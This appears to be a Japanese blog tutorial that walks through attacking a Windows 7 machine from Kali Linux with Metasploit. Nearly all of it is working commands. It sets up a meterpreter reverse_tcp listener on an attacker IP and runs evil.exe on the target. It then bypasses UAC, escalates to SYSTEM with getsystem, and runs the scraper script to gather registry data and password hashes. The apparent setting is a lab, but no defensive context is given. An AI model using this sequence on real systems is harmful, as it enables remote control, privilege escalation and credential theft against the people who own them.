Windows7 システム情報の収集

Windows7 システム情報の収集

まず、
KaliLinux でリバースシェルを待ち受けにして
Windows 7 で evil.exe を実行

KaliLinux を起動し

1
msfconsole


Metaploit を起動

msf コンソールが起動したら

1
use exploit/multi/handler

でハンドラーモジュールを使用

1
set payload windows/meterpreter/reverse_tcp

でペイロードをセット

1
set LHOST 192.168.1.134

で KaliLInux のIPアドレスを設定

1
show options

で設定を確認

これで

1
exploit

でペイロードが実行され、待受状態になるので

windows7 で evil.exe を実行

次に

1
background

というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする

次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る

1
use exploit/windows/local/bypassuac

で使用するペイロードをセット

1
show options

でオプションで使用するセッションIDが必要なのがわかる

次に

1
set SESSION 1

でセッションをセット

そして再度 reverse_tcp を設定

1
set payload windows/meterpreter/reverse_tcp

でペイロードをセット

1
set LHOST 192.168.1.134

で KaliLInux のIPアドレスを設定

1
show options

で設定を確認

これで

1
exploit

でUAC機能をバイパスした状態で実行できる

次に権限昇格

1
getsystem -t 1

これでユーザ権限を確認するとSYSTEM権限になっているのがわかる

1
getuid

必要なセッションは2のほうなので
不要なセッション1はとじる

1
background

というように
background コマンドを使い

1
sessions -i

とすると
2つめのセッションのほうが管理者権限であることが確認できる

セッションを閉じるには
sessions コマンドの -kオプションを使う

1
sessions -k 1

これで

1
sessions -i

とすると
セッション2だけ残っているのがわかる

不要なセッションは削除したので

1
sessions 2

で再びセッションに戻し

1
run scraper

でシステム情報を収集する

これには
レジストリ
パスワードハッシュなどが含まれるため時間がかかる

なお、実行結果は

1
.msf4/logs/scripts/scraper/

の下へダウンロードされ保存される

保存されるフォルダ名は
IPアドレス_日付_数値列
となる

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です